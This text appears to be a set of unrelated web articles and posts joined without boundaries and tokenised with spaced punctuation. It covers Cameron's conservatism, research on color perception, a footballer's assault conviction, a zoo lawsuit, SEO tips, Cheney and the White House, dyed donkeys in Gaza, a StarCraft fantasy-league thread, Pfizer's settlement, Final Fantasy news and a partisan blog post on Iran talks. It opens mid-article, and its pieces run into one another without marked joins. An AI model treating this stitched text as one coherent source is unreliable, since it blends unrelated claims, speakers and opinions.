But he muddied the waters by making his main theme a pledge to end Labour 's culture of " big government " .
Download the new Independent Premium app Sharing the full story , not just the headlines
I asked a senior Tory on the party 's left flank whether he regards Mr Cameron as a fellow liberal Conservative .
He paused .
" I think so , " he said , adding that he felt reassured by that picture of Macmillan , Prime Minister from 1957 - 63 , who would certainly be labelled " progressive " today .
My liberal Tory described Mr Cameron as a pragmatist who would make a socially liberal prime minister even if he is a " fiscal conservative " .
That could be an attractive mix for many voters given the dire economic straits we 're in , as yesterday 's gloomy economic figures reinforced .
Yet he conceded the potential contradiction in Mr Cameron blaming Britain 's ills on Labour 's " big government " and his commitment to a progressive agenda .
There is frustration in the Cameron inner-circle that his conference speech , while generally well received , did not win plaudits from liberal commentators .
One leading Cameroon complained to me : " They only heard half the message .
They closed their ears to the other half so they could portray ' smaller government ' as a return to Thatcherism .
That is not what David was saying . "
Aides say Mr Cameron will try to square the circle in another speech soon .
It will not be easy to convince his critics .
They argue that the economic crisis was not caused by government action but by government inaction in not reining in the free market .
And Labour will point out that only large - scale intervention around the world prevented global recession turning into a slump .
Even some Tories wonder how a Cameron government would tackle issues like poverty ( as he promised to do more effectively than Labour ) and climate change without more state intervention .
It is hard to see how this happens with less .
The Tory leader faces the classic dilemma of how to address two audiences .
Progressive voters will probably welcome his landmark announcement this week that some local Conservative associations will choose their election candidates from all - women shortlists .
But yesterday the backlash from the Tory grassroots grew .
A survey of 1,900 party members by the ConservativeHome website found that 87 per cent oppose the idea , and only 12 per cent believe the measure is justified .
A tiny 0.2 per cent agree that the number of women
Tory candidates is an issue for ordinary voters ; 97 per cent disagree .
This snapshot shows that the Cameron modernisation project has still not seeped deep into his party .
It tolerates him because he is ahead in the opinion polls , but it does not love him .
It demands more TLC from him , and warns of storms ahead .
Tim Montgomerie , editor of ConservativeHome , said : " Being on top of public opinion is n't the only skill required in a party leader .
Managing the Conservative coalition is also a skill .
He can treat core supporters in a cavalier way now but he will need them in the lean times that almost certainly lie ahead . "
Does it matter ?
Tony Blair won public support by defining himself against his party 's unreconstructed brigade .
Perhaps Mr Cameron is trying to emulate him .
But there are dangers , notably strong polling evidence that voters like the Tory leader but are still unsure about his party .
So he needs to take it with him .
" They are not warming to the rest of us , " one frontbencher admitted .
On the face of it , Mr Cameron 's " small government " pledge widens the divide between the Tories and Labour .
Gordon Brown 's conference speech a week earlier was more an advert for what government can do than an explanation of what it can't because of the public debt crisis .
And yet , not for the first time , the differences between the two main parties are smaller than they appear .
In his BBC interview , Mr Cameron said : " The question is not between a government or no government .
It 's between what I would argue is a sort of big , bossy , top - down centralised government and what I would like to see , which is smarter , more decentralised , more enabling government . "
As it happens , Labour will promise " smarter , not bigger " government too as it tries to repel the Tory attack .
It will portray Mr Cameron 's language on the size of the state as cover for a crusade to roll it back , completing Lady Thatcher 's unfinished business and imposing damaging spending cuts .
Lord Mandelson , the Business Secretary , senses a weakness in Tory defences .
" If you start with the ideological assumption that government is the problem , you will inevitably think the issue is big versus small government , " he told a conference in Oxford .
" And you will inevitably base your prospectus for government on how to cut it , regardless of the consequences . "
( PhysOrg.com ) --
Color is normally thought of as a fundamental attribute of an object : a red Corvette , a blue lake , a pink flamingo .
Yet despite this popular notion , new research suggests that our perception of color is malleable , and relies heavily on biological processes of the eye and brain .
The brain 's neural mechanisms keep straight which color belongs to what object , so one does n't mistakenly see a blue flamingo in a pink lake .
But what happens when a color loses the object to which it is linked ?
Research at the University of Chicago has demonstrated , for the first time , that instead of disappearing along with the lost object , the color latches onto a region of some other object in view - a finding that reveals a new basic property of sight .
Research at the University of Chicago explains for the first time how color latches on to a portion of the brain , separate from the object to which it had been associated .
That color can be reassigned to a new object .
Credit : University of Chicago
The research shows that the brain processes the shape of an object and its color in two separate pathways and , though the object 's shape and color normally are linked , the neural representation of the color can survive alone .
When that happens , the brain establishes a new link that binds the color to another visible shape .
" Color is in the brain .
It is constructed , just as the meanings of words are constructed .
Without the neural processes of the brain , we would n't be able to understand colors of objects any more than we could understand words of a language we hear but do n't know , " said Steven Shevell , a University of Chicago psychologist who specializes on color and vision .
Shevell 's findings are reported in a paper , " Color - Binding Errors During Rivalrous Suppression of Form , " in the current issue of Psychological Science .
Wook Hong , who received his Ph.D. at UChicago and is now a post - doctoral fellow at Vanderbilt University , joined Shevell in writing the paper and conducting the research .
Their work expands the understanding of how the brain is able to integrate the multiple features of an object , such as shape , color , location and velocity , into a unified whole .
" An aspect of human vision that we normally do n't appreciate is that different features of an object , including color and shape , can be represented in different parts of the brain , " said Shevell , the Eliakim Hastings Moore Distinguished Service Professor in Psychology and Ophthalmology & Visual Science .
If a person sees a basketball coming , it is perceived as having a particular color , shape and velocity .
" The knitting together , or what can be called ' neural gluing , ' of all those different features so we see a unified object is a complex function done by the brain .
Our research focused on how the brain does that , " Shevell explained .
To study how the brain represents the color of objects , the researchers used a technique called binocular rivalry .
The technique presents a different image to each eye and thus pits signals from the right eye against signals from the left .
" The brain has difficulty integrating the two eyes ' incompatible signals .
When the signals from the two eyes are different enough , the brain resolves the conflicting information by suppressing the information from one of the eyes , " Shevell said .
" We exploited this feature of the brain with a method that caused the shape from one eye to be suppressed but not its color . "
The researchers first showed subjects vertically oriented green stripes in the left eye and a horizontally oriented set of red stripes in the right eye .
" The brain can not fuse them in a way that makes sense .
So the brain sees only horizontal or vertical , " Shevell said .
For their study , the researchers developed a new form of the technique that allowed the horizontal pattern to be suppressed without eliminating its red color , which continued on to the brain .
At this point , the brain has a musical chairs problem .
Both the red and green colors reach consciousness but with only the one vertical pattern — one object but two colors .
The surprising result was that the " disembodied red , which originated from the unseen horizontal pattern in one eye , glued itself to parts of the consciously seen vertical pattern from the other eye .
That proves the idea of neural binding or neural gluing , where the color is connected to the object in an active neural process , " Shevell said .
" To us it seems automatic , " Shevell added .
" Every basketball has a color .
Every shirt has a color , but the brain must link each object 's color to its shape . "
Source : University of Chicago ( news : web )
Explore further
Yes , we have no blue bananas
Show Notes
– Date – July 4th , 2017
– Send your cool “ SCIENCE ” shout - outs to .
– Theme song by Steve Seamans of the Daisy Dillman Band .
– Get the song HERE .
– Thank you to everyone who has been purchasing books , Skepticality stuff , or using our Amazon link to help us .
Wikipedia Update [ x : xx ]
– Go to Conferences !
– More about Susan Gerbic .
Skeptical Humanities [ x : xx ]
– The Seth Rich ‘ Conspiracy ’ .
– Skeptical Humanities .
Interview : [ xx : xx ]
– Gleb Tsipursky
– Originally from Maldova
– Was the president for the SSA at New York University
– The Backfire Effect .
– The Pro-Truth Pledge
– Gleb ’s Free E-Book about Finding Your Purpose Using Science .
– Follow Gleb on Twitter or Facebook
Outro Music [ x:xx : xx ]
– Outro music donated by Trent Brusky of Dropfox .
The Jamaican international had said he " did n't touch any girl in that club " Premier League footballer Marlon King has been jailed for 18 months for sexually assaulting a woman - and will be sacked by Wigan Athletic .
The striker was repeatedly " cold- shouldered " by the student in a bar in London , Southwark Crown Court heard .
King was convicted of sexually assaulting the woman and causing actual bodily harm at the bar last December .
Following sentence , the jury heard the player had 13 previous convictions , including violence against women .
During the trial , the court heard he groped his 20 - year - old victim and then punched her , leaving her with a broken nose .
' Gratuitous violence '
The father - of - three , from Waltham Cross , Hertfordshire , had insisted it was a case of mistaken identity .
But he was convicted by a majority of 10 - 2 .
The assault happened at the Soho Revue Bar at a time when he was on loan with Hull City .
King was celebrating two occasions - his wife 's latest pregnancy and the scoring of a winning goal - with a night out in the West End .
Prosecution lawyer Roger Daniells - Smith said King had struck up a conversation with his victim by saying : " Do n't you know who I am ?
I 'm a millionaire . "
We will now be in the process of severing his contract .
To say the least , I am really , really disappointed
Dave Whelan
Chairman , Wigan Athletic
Wigan to sack jailed striker King
The court heard she replied : " I do n't care who you are ; take your millionaire - self away from our table . "
He groped the woman and she told him : " Do n't do that , it 's not nice .
Do n't touch me . "
King was warned off her again but he continued to stroke the woman's hair and then told her she was not in his league , the court heard .
After she pushed him in the chest , King lost his temper and a moment of " completely gratuitous violence " led to him " smashing " the victim to the floor , jurors were told .
Two other people standing beside him were also knocked away as a result of the force of the blow he inflicted .
Several witnesses testified that King was responsible , despite his denial .
King will be left without a club once he has served his sentence
They included a football coach who insisted the 29 - year - old Jamaican international was the assailant .
Wigan Athletic chairman Dave Whelan said King " was finished with football " at the club .
" We will now be in the process of severing his contract , " he told BBC Radio 5 live .
" To say the least , I am really , really disappointed . "
Mr Whelan continued : " It 's really upsetting and it just sets such a bad example for any youngster coming through who wants to be a professional footballer . "
In 2002 King , then playing for Gillingham , served five months of a two - year prison sentence for handling a stolen car before being released on appeal .
Other previous convictions include dishonesty and a range of motoring offences , including drink - driving .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
A dolphin plays with a basketball underwater at the Nuremberg zoo , April 10 , 2009 .
REUTERS / Alexandra Beier
CHICAGO ( Reuters ) - A woman is suing a Chicago - area zoo for a 2008 fall near a dolphin exhibit , accusing zookeepers of encouraging the mammals to splash water and then failing to protect spectators from wet surfaces , local media reported on Thursday .
In her suit filed earlier this week , Allecyn Edwards said she was injured while walking near an exhibit at Brookfield Zoo , where a group of Atlantic bottlenose dolphins were performing , media said .
Officials “ recklessly and willfully trained and encouraged the dolphins to throw water at the spectators in the stands , making the floor wet and slippery , ” but failed to post warning signs or lay down protective mats or strips , the suit said , according to the reports .
Edwards is demanding more than $ 50,000 for lost wages , medical expenses and emotional trauma from the Chicago Zoological Society and the Forest Preserve District of Cook County , which operate the zoo in Chicago ’s southwest suburbs .
The suit was filed in Illinois ’ Circuit Court of Cook County .
by
One of the most important things you need to do when trying to build up traffic to your blog or site is to determine which keywords you ’re going to target .
You ’ll want to pick keywords that are broad enough that they generate a lot of searches , but specific enough so that the traffic you do it is targeted .
Unfortunately , this is a pretty fine line to walk .
To give you an example , I worked incredibly hard to get Daily Fuel Economy Tip ranked on the first page of Google for the search term “ fuel economy . ”
I figured if I could get this widely searched keyword I ’d be set and get thousands of free visitors each day on this keyword alone .
Yeah , not so much .
Turns out I get most of my search engine traffic from long - tail keywords like “ difference between diesel and gasoline , ” or “ reduce fuel consumption . ”
In fact , probably just one percent of my site ’s total traffic comes from the highly coveted keyword “ fuel economy . ”
When you ’re working to get ranked so that you can get highly targeted traffic or buyers with their credit card out and ready to go , make sure you ’re going after keywords that are going to convert .
You do n’t always have to go after the big game keywords because more often than not they ’re not going to be the best terms for converting visitors into long - term readers or buyers .
Instead , focus on specific or action keywords .
For example , which keyword do you think is going to provide better conversions : “ cell phone cash ” or something like “ review of cell phone cash , ” or “ buy cell phone cash program ? ”
Based on previous experience , it almost a foregone conclusion that the long - tail , action specific keywords will convert better .
Just targeting “ cell phone review ” will bring information seekers , whereas making a slight change and targeting “ buy cell phone cash ” will bring in targeted , ready to act buyers .
The White House blasted former Vice President Dick Cheney on Thursday for his criticism that the Obama administration is " dithering " on Afghanistan .
White House press secretary Robert Gibbs went after the former vice president , suggesting that Cheney 's call for quick action in Afghanistan from President Barack Obama contrasts sharply with Cheney 's own record while in office .
" What Vice President Cheney calls dithering , President Obama calls his solemn responsibility to American men and women in uniform , and the men and women of this country , " Gibbs said in his daily briefing .
" I think we 've all seen what can happen when somebody does n't take this responsibility seriously , " Gibbs added .
Cheney launched one of the most stringent criticisms of the Obama administration 's approach to Afghanistan in a speech Wednesday evening , suggesting that Obama " seems afraid " to make a decision on Gen.
Stanley McChrystal 's recommendation for more troops in the country .
" I think it 's a curious comment given , I think it 's pretty safe to say , that the vice president was for seven years not focused on Afghan , " Gibbs said .
" Even more curious given that an increase in troops sat on desks in this White House , include the vice president 's for more than eight months . "
GAZA ( Reuters ) -
Two white donkeys dyed with black stripes delighted Palestinian kids at a small Gaza zoo on Thursday who had never seen a zebra in the flesh .
With their long ears , drooping heads and sleepy eyes , the impostors probably would not have fooled the zoo ’s only lioness .
But the effect achieved by the zoo owners ’ dye job looks not so bad -- to the unpracticed eye , and from a distance .
On closer inspection it resembles the classic striped convict suit of cartoon strips .
Nidal Barghouthi , whose father owns the Marah Land zoo , said the two female donkeys were striped using masking tape and women ’s hair dye , applied with a paint - brush .
“ The first time we used paint but it did n’t look good , ” he said .
“ The children do n’t know so they call them zebras and they are happy to see something new . ”
A genuine zebra would have been too expensive to bring into Israel - blockaded Gaza via smuggling tunnels under the border with Egypt , said owner Mohammed Bargouthi .
“ It would have cost me $ 40,000 to get a real one . ”
Gaza ’s Palestinians are impoverished by their isolation under an Israeli embargo against its Islamist Hamas rulers , who refuse to give up armed resistance against the Jewish state .
Bargouthi’s zoo charged an entrance fee of just $ 15 for a full busload of children .
Avidkeystamper Profile Blog Joined June 2008 United States 8551 Posts # 2
I vow to actively trade this season to get the most out of this wonderful feature .
Jaedong
Kyuukyuu Profile Blog Joined January 2009 Canada 6262 Posts # 3 Iris ... 1 point ...?
Hot_Bid Profile Blog Joined October 2003 Braavos 36165 Posts Last Edited : 2009-10-05 06:54:54 # 4
On October 05 2009 15:49 Kyuukyuu wrote :
Iris ... 1 point ...?
what about it ?
Iris went 0 - 4 last round .
The only reason he did n't cost 0 is because CJ won games and you get points for team wins .
what about it ?
Iris went 0 - 4 last round .
The only reason he did n't cost 0 is because CJ won games and you get points for team wins .
@ Hot_Bid on Twitter - ESPORTS life since 2010 - http://i.imgur.com/U2psw.png
Phelix Profile Blog Joined July 2008 1881 Posts # 5
Seems like all the Protoss are somewhat overpriced , and with the new maps coming out that are so Z/T favored over P , prices are bound to go down over the season .
Iris at one point is a steal , but it depends if CJ keeps sending Skyhigh as its main Terran .
Khan at 3 points is interesting , they made the playoffs last year , but Protoss stands no chance , at least in Round 1 , so that could be the reason why they dropped in price .
There are some retired players on the roster , like GGPlay .
With that said , it 's time for me to claim a # 1 spot on FPL .
Venture Capital is better off spent on lottery tickets rather than investing in E - Sports ; you 'll get a far better return .
The difference is simple : Koreans are tryharding at the game , foreigners are tryharding in real - life .
k Ore Profile Blog Joined April 2009 Canada 3617 Posts # 6
How many points does the Anti-Team have to be ?
http://www.starcraftmecca.net
- Founder
puppykiller Profile Blog Joined August 2009 United States 3104 Posts # 7 Backho 6 ... Jangbi 2 ... tough choice
Why would I play sctoo when I can play BW ?
Hot_Bid Profile Blog Joined October 2003 Braavos 36165 Posts Last Edited : 2009-10-05 06:58:42 #8
On October 05 2009 15:55
Phelix wrote :
Seems like all the Protoss are somewhat overpriced , and with the new maps coming out that are so Z/T favored over P , prices are bound to go down over the season .
Iris at one point is a steal , but it depends if CJ keeps sending Skyhigh as its main Terran .
Khan at 3 points is interesting , they made the playoffs last year , but Protoss stands no chance , at least in Round 1 , so that could be the reason why they dropped in price .
There are some retired players on the roster , like GGPlay .
With that said , it 's time for me to claim a # 1 spot on FPL .
I removed GGPlay and Shine .
Any others ?
I removed GGPlay and Shine .
Any others ?
@ Hot_Bid on Twitter - ESPORTS life since 2010 - http://i.imgur.com/U2psw.png
numLoCK Profile Blog Joined November 2008 Canada 1416 Posts # 9
How does the anti-team work ?
Just pick players who will never win or what ?
Raydog Profile Blog Joined April 2009 United States 632 Posts # 10 Raymond
Main Team
2 BaBy
7 ( captain )
2 HoeJJa
2 JangBi
2 July
6 Violet
6 CJ Entus
Anti Team
8 Calm
6 GuemChi
1 Hydra
gogogo EffOrt ( captain ) gogogo Shew
k Ore Profile Blog Joined April 2009 Canada 3617 Posts # 11 kOre
Main Team
7 EffOrt
1 Iris
10 ( captain )
2 JangBi
2 sAviOr
4 sKyHigh
4 Woongjin Stars
Anti Team
6 BackHo
6 GuemChi
3 Shuttle
Zerg +
Terran imba maps = 1 Protoss for main and 3 for anti!
10 Jaedong ( captain ) Zerg +
Terran imba maps = 1 Protoss for main and 3 for anti !
http://www.starcraftmecca.net
- Founder
Hot_Bid Profile Blog Joined October 2003 Braavos 36165 Posts Last Edited : 2009-10-05 07:03:21 # 12 On October 05 2009 15:55 kOre wrote :
How many points does the Anti-Team have to be ?
On October 05 2009 15:58 numLoCK wrote :
How does the anti-team work ?
Just pick players who will never win or what ?
The Anti Team has to be at minimum 13 points , so its actually quite hard to select players that never play or never win .
The Anti Team scoring is exactly same as Main Team , except you lose that number of points .
For example , if a player on your Anti Team wins , you 'd get - 2 .
The Anti Team has to be at minimum 13 points , so its actually quite hard to select players that never play or never win .
The Anti Team scoring is exactly same as Main Team , except you lose that number of points .
For example , if a player on your Anti Team wins , you 'd get - 2 .
@ Hot_Bid on Twitter - ESPORTS life since 2010 - http://i.imgur.com/U2psw.png
LunarDestiny Profile Blog Joined August 2008 United States 4177 Posts Last Edited : 2009-10-05 07:03:49 # 13
Sweet deals :
Iris - 1
Movie - 1
Yellow[ arnc ] - 3
Jangbi - 2
Samsung - 3
coolcrimefighter Profile Blog Joined November 2008 United States 327 Posts # 14
damn I already submitted mine with a 15 point antiteam
God Warriors
Main Team
9 ( captain )
3 Canata
1 Casy
3 Hyuk
1 Iris
5 Luxury
8 SK Telecom T1
Anti Team
6 BackHo
6 GuemChi
3 Shuttle
wtf why did everyone else make their anti team 15 points then - _ - damn I already submitted mine with a 15 point antiteam Bisu ( captain )
numLoCK Profile Blog Joined November 2008 Canada 1416 Posts # 15 Ok
Thanks !
Hahaha my plans are still foiled by the " one of each race on main team " dealie .
Oh well , time to pick a protoss :/
motbob Profile Blog Joined July 2008 United States 12383 Posts # 16 NO TRADES
Main Team
3 Canata
7 fantasy
5 great
6 GuemChi
3 ( captain )
3 Jaehoon
3 MBCGame Hero
Anti Team
4 Much
5 SangHo
4 Sea
Hyuk ( captain ) Moderator Good content always wins .
DoctorHelvetica Profile Blog Joined July 2008 United States 14909 Posts Last Edited : 2009-10-05 07:08:08 # 17 peep show for dinosaurs
Main Team
7 EffOrt
7 ( captain )
5 Luxury
1 Movie
4 UpMagiC
3 YellOw [ ArnC ]
3 Samsung KHAN
Anti Team
6 GuemChi
2 HakSoo
5 Horang2
fantasy ( captain ) ^ this post is just a mere spook
Phelix Profile Blog Joined July 2008 1881 Posts # 18 Adverse Selection
Main Team
7 fantasy
10 ( captain )
1 Iris
2 JangBi
2 Pure
3 ZerO
5 KTF MagicNs
Anti Team
5 Horang2
4 Justin
4 Much
I think that my main team could use some better balance , will be most likely changing until signup ends .
10 Flash ( captain ) I think that my main team could use some better balance , will be most likely changing until signup ends .
Venture Capital is better off spent on lottery tickets rather than investing in E - Sports ; you 'll get a far better return .
The difference is simple : Koreans are tryharding at the game , foreigners are tryharding in real - life .
k Ore Profile Blog Joined April 2009 Canada 3617 Posts # 19 On October 05 2009 16:03 coolcrimefighter wrote :
wtf why did everyone else make their anti team 15 points then -_-
damn I already submitted mine with a 15 point antiteam
God Warriors
Main Team
9 ( captain )
3 Canata
1 Casy
3 Hyuk
1 Iris
5 Luxury
8 SK Telecom T1
Anti Team
6 BackHo
6 GuemChi
3 Shuttle
wtf why did everyone else make their anti team 15 points then - _ - damn I already submitted mine with a 15 point antiteam Bisu ( captain )
Raydog made his Anti-Team 15 so I assumed it was 15 as well WTFFFFFF Raydog made his Anti-Team 15 so I assumed it was 15 as wellWTFFFFFF http://www.starcraftmecca.net
- Founder
johanes Profile Blog Joined May 2008 Czech Republic 2223 Posts # 20 4pool
Main Team
2 BaBy
3 Canata
10 ( captain )
3 Hyuk
2 JangBi
5 Luxury
5 KTF MagicNs
Anti Team
5 free
4 Justin
5 RorO
Ultimate winnig team , watch and learn !
10 Flash ( captain ) Ultimate winnig team , watch and learn !
1 2 3 4 5 20 21 22 Next All
Pfizer Pays $ 2.3B , but Will It Change the Pharmaceutical Industry ?
As long as profits outweigh penalties , drugmakers may continue practices .
Sept. 3 , 2009  --
At $ 2.3 billion , it 's a record - breaking settlement that includes the largest fine ever levied in U.S. history , but drug industry experts said that the hefty sum Pfizer agreed to Wednesday will do little to curb highly profitable , unethical marketing practices by some companies .
The sum folds in civil and criminal penalties related to illegal prescription drug marketing , bringing the investigation of the pharmaceutical behemoth by the U.S. Department of Justice to a close .
The settlement includes $ 1.3 billion in criminal fines related to promoting the arthritis and menstrual pain drug Bextra for uses and in doses not approved by the Food and Drug Administration , putting patients at increased risk for heart attacks and strokes .
Pfizer voluntarily removed Bextra from the market in 2005 .
But promoting off - label drug use to physicians is commonplace .
Ethics experts and policymakers say more stringent government oversight is necessary , but that as long as the profits are bigger than the penalties , drug companies are unlikely to revise their marketing models .
" This suit shows that Pfizer controlled what physicians and consumers believed to be the effectiveness and safety of Bextra in ways not supported by the real science Pfizer had done and was not approved by the FDA , " said Dr. Jon Abramson , a pharmaceutical safety and ethics expert at the Harvard Medical School .
" Those are the necessary ingredients of blockbuster drugs . "
Pharmacia and Upjohn Company Inc. , a subsidiary of Pfizer , will plead guilty to one criminal count of violating the U.S. Food , Drug , and Cosmetic Act in promoting off - label Bextra use .
Lavish Trips for Prescribing Doctors
Part of Pfizer 's marketing campaign included lavish " consultant meetings " in exotic locations that physicians were paid up to $ 1,500 to attend , in the hopes that they might increase the number of prescriptions they wrote , according to a lawsuit filed by John Kopchinski , a former Pfizer sales representative .
" At Pfizer , I was expected to increase profits at all costs , even when sales meant endangering lives , " Kopchinski said , in a statement .
" I could n't do that . "
Department of Health and Human Services Secretary Kathleen Sebelius called the settlement today " historic , " not only because of its size but because Pfizer agreed to a Corporate Integrity Agreement , which she said would offer some transparency in how the company researches and markets its drugs , including what kind of financial incentives the company offers doctors who prescribe Pfizer drugs .
Pfizer Agrees to $ 2.3B Settlement for Illegal Marketing Practices
Chris Loder , a spokesperson for Pfizer , pointed out that the company had disclosed the financial details of the settlement in January , when it also announced its purchase of rival pharmaceutical company Wyeth for $ 68 billion .
Loder said the company does " regret certain actions taken in the past on this . "
Some doctors agreed that increasing the penalties for fraudulent marketing could send a message to drug companies .
" The fact that settlements are increasing in amounts , to me , is a good thing , " said Dr. Jerry Kassirer , an ethicist at the Tufts University School of Medicine .
" The higher the cost to these companies of illegal marketing , the more effective it will be in deterring them from doing these things in the future . "
Profit Still Outweighs the Penalties
But others are not so sure drug companies will get the message .
" They may be good medicines .
...
Why not spend the money to prove they 're good medicines ? " said Bill Vaughan , senior health policy analyst for Consumer 's Union .
" There is a mind - set in this industry , because it is such a profitable industry , that cheating is OK .
...
If we have to pay these penalties , tough , we 'll make up for it [ in sales ] . "
Industry insiders say drug companies often forgo legal considerations in favor of profit .
If companies , people or entities " are able to make that decision and determine that there 's an economic incentive to break the law , they 'll break the law , " said Reuben Guttman , attorney for Glen Demott , a former Pfizer drug representative .
Change in a financially driven industry depends on whether a few billion dollars of penalty will affect the company 's net profits or share costs .
In 2008 , Pfizer earned $ 48.3 billion in revenue .
" It wo n't make a dent if the conduct that led to the settlement is not addressed as part of health care reform , " said Abramson , who was the expert consultant for the plaintiff attorneys in the Bextra case in 2007 .
" The real problem is this behavior is not isolated to Bextra nor Pfizer but in essence is the way the pharmaceutical industry expands the sales of its drugs , " Abramson said .
" Unless health care reform can address misrepresentations , withholding science and control claims made to consumers , Americans will continue to pay too much for health care that is not as effective and is expensive . "
Without Higher Penalties , the Industry Wo n't Change , Drug Safety Expert Says
While it may seem an unnecessary risk to prescribe a drug for off - label use , Abramson said some doctors are still naive about what pharmaceutical companies tell them and what they do n't .
" Practicing physicians are busy , they have a ton of information coming at them , " Abramson said .
" They still hold on to the idea that they 'll sort through the information they 're getting and decide what 's applicable to their patient .
But you can't sort through information you 've never seen . "
Although Pfizer 's settlement is the largest to date , it is only one among many such settlements made across the pharmaceutical industry each year .
Drug companies have paid more than $ 11 billion over the last eight years in fines for illegal promotions , among other thing .
" Until there are penalties that cause shareholders to demand that officers no longer engage in this kind of behavior ... this behavior is going to continue , " Abramson said .
Gamers , if you were expecting Final Fantasy Versus XIII at this year ’s Tokyo Game Show , you are in for some disappointment .
Final Fantasy Versus XIII is currently in development by Square Enix , and is part of Fabula Nova Crystallis Final Fantasy XIII ​ alongside Final Fantasy XIII ( PS3 ) and Final Fantasy Agito XIII ( PSP ) .
Coming straight from Tetsuya Nomura , known for creating the Kingdom Hearts series , the designer confirmed that Final Fantasy XIII will be in playable form .
But unfortunately , Final Fantasy Versus XIII will not be at the show .
Instead of focusing on titles that may come later , Square Enix is giving the spotlight to titles coming next year by bringing playable demos of those games to TGS .
Final Fantasy XIII is currently slated for Winter 2009 for Japan , and Spring 2010 for North America .
Final Fantasy Versus XIII , however , has no release period as of this time .
[ Source ]
Reddit Email 0 Shares
For 8 years , Bush - Cheney practiced what I call “ belligerent Ostrichism ” toward Iran .
They refused to talk to Tehran .
They wanted to ratchet up sanctions on it .
Bush sent 2 aircraft carriers to the Gulf to menace Iran .
Bush ’s spokesmen professed themselves afraid of Iran ’s unarmed little speedboats in the Gulf .
Aside from issuing threats to attack and destroy Iran the way they did Iraq , Bush - Cheney had nothing else to say on the matter .
During the 8 years , Iran went from being able to enrich to .2 % to being able to enrich to 3.8 % , and increased its stock of centrifuges significantly .
Bush - Cheney gesticulated and grimaced and fainted away at the horror of it all , but they accomplished diddly - squat .
Barack Obama pwned Bush - Cheney in one day , and got more concessions from Iran in 7 1/2 hours than the former administration got in 8 years of saber - rattling .
Delegates of the five permanent members of the United Nations Security Council plus Germany met with representatives of Iran ’s Supreme Leader , Ayatollah Ali Khamenei for 7 and a half hours on Thursday for talks on Iran ’s nuclear research program .
Amazingly , there were signs of significant progress even on the first day , which most seasoned observers had not expected .
1. Iran agreed to allow inspectors from the United Nations ’ International Atomic Energy Agency to visit the newly announced facility near Qom within the next two weeks .
2. Iran agreed to meet again at the end of October .
3. Iran agreed to send “ most ” of its stock of low enriched uranium ( 3.5 % ) to Russia for processing to the roughly 20 % degree of enrichment needed to run its small reactor producing medical isotopes .
Iran has about 3200 pounds of low - enriched uranium , and is willing to send 2600 to Russia .
That is a little over a ton , or about what a single Ford Focus weighs .
Iran does not anyway have the ability to enrich to more than about 4.8 % at the moment , and the medical reactor will be out of fuel in a little over a year , so if they continued to want the medical isotopes they would be forced to take this step anyway .
Russia Today has video :
The NYT report on all this adds in all kinds of extraneous and unproven allegations , of a network of secret enrichment plants or secret stores of low - enriched uranium or nefarious Iranian plans to make a bomb , or of Iran having enough nuclear material to make a bomb ( irrelevant if they ca n’t enrich to 90 % ) , and what Israel thinks of all this ( since the Israelis really have thumbed their nose at the Nuclear Non-Proliferation Treaty and made a whole arsenal of bombs , thus further destabilizing the Middle East , why they are n’t under UN sanctions I ’ll never understand ; but they certainly do n’t have standing to dictate anything to other countries on the proliferation issue ) .
It reminds me of all the NYT front page stories about aluminum tubes and Iraqi WMD of Judy Miller in 2002 .
Is n’t it bad journalism to report completely unproven allegations for which there is no evidence ?
Back to the real world :
The steps outlined above are only pledges on Iran ’s part , of course , and we have to see if they are implemented .
President Obama made much the same points , demanding that Iran follow through on fuller IAEA inspections , a long - time demand of the US .
Presumably the regime is being so forthcoming because it needs a win on the international stage to shore up its flagging legitimacy at home , in the way of presidential elections widely viewed as fraudulent .
It is possible that hard liners like the Iranian Revolutionary Guards Corps will attempt to torpedo these positive moves .
For further proof that Congress has numerous brain - dead people in it , its reaction to Iran ’s being forthcoming in Geneva was to authorize legislation that would try to punish companies for supplying gasoline to Iran .
Somehow I think someone will take the contract , and anyway Iran will up its petroleum refining capacity in the coming couple of years .
Congress should worry how the US is going to fuel its transportation in coming years .
The USG Open Source Center translated the remarks of Khamenei ’s secretary , Sa’id Jalili , on the Geneva negotiations :
“ FYI — Iran Nuclear Negotiator Jalili Says 5+1 Talks Positive
Islamic Republic of Iran News Network Television ( IRINN )
Thursday , October 1 , 2009
Document Type : OSC Summary
Tehran Islamic Republic of Iran News Network Television ( IRINN ) in Persian at 1636 GMT began a live relay of a news conference by Iran ’s Supreme Security Council secretary Sa’id Jalili in Geneva following the 5+1 nuclear talks .
The news conference was also broadcast live by Press TV and Al - Alam TV .
Jalili said that today ’s talks concentrated on security , international developments , economy , and regional issues .
He added that these talks could be a platform to resolve the regional and global issues .
Jalili said that one of the most important issues is global security .
Jalili added that some media try to create terror within their audience .
He called it “ media terrorism . ”
Jalili said : “ One of the important issues we have proposed in the proposal package is to deal with some of the genuine threats which the human community suffers from and should be concerned about .
One of these issues is the issue of Weapons of Mass Destruction ( WMDs ) .
WMDs are a threat to the human community , which must definitely be dealt with through international cooperation .
The issue of disarmament is the most important one . ”
Iran ’s nuclear negotiator asked for all nuclear arsenals to be destroyed .
Jalili said that at the same time countries have the right to achieve peaceful nuclear technology .
Jalili said that best method is to boost international regulations bodies , such as the IAEA and the Non-Proliferation Treaty ( NPT ) .
Jalili then referred to the global financial crisis .
He said that worldwide cooperation could be useful in resolving this matter .
Jalili criticized the country ’s that support sanctions and said sanctions will not help the global financial crisis .
Jalili then talked about terrorism , narcotics , and organized crime .
He said that if the public are not scared then a basis for mutual cooperation will be created .
Jalili called the Geneva talks constructive .
He said : “ Today we have agreed to continue these talks with a positive thinking .
Hopefully next month we can reach an agreement on how to continue these talks so that cooperation would become reality . ”
Jalili then started answering questions .
In response to a question by an Egyptian correspondent , Jalili said : Worldwide and regional security is only possible through cooperation .
Jalili said that today ’s talks mainly concentrated on how to take these talks forward .
An Israeli correspondent asked Jalili about Ahmadinezhad ’s comments on Israel .
Jalili refused to answer his question .
Another correspondent asked the same question from Jalili .
The Iranian official said that the Palestine problem is a 60 year - old issue .
Jalili said that Iran wants a democratic solution to the Palestinian territories .
He added that only a just solution could work for the people of this region .
A German correspondent asked if there are any unknown nuclear facilities in Iran .
Jalili said that everything has to go through the IAEA .
Iran ’s peaceful nuclear activities are in full cooperation with IAEA , Jalili said .
One correspondent asked about the outcome of talks with William Burns , the US representative .
Jalili said that he was aware that the 5+1 countries had a united stance against Iran , but that the talks were productive .
Fars news agency , affiliated to Iran Revolution Guards Corps , asked if the talks with the 5+1 countries would continue and Jalili ’s response was positive . ”
End / ( Not Continued )
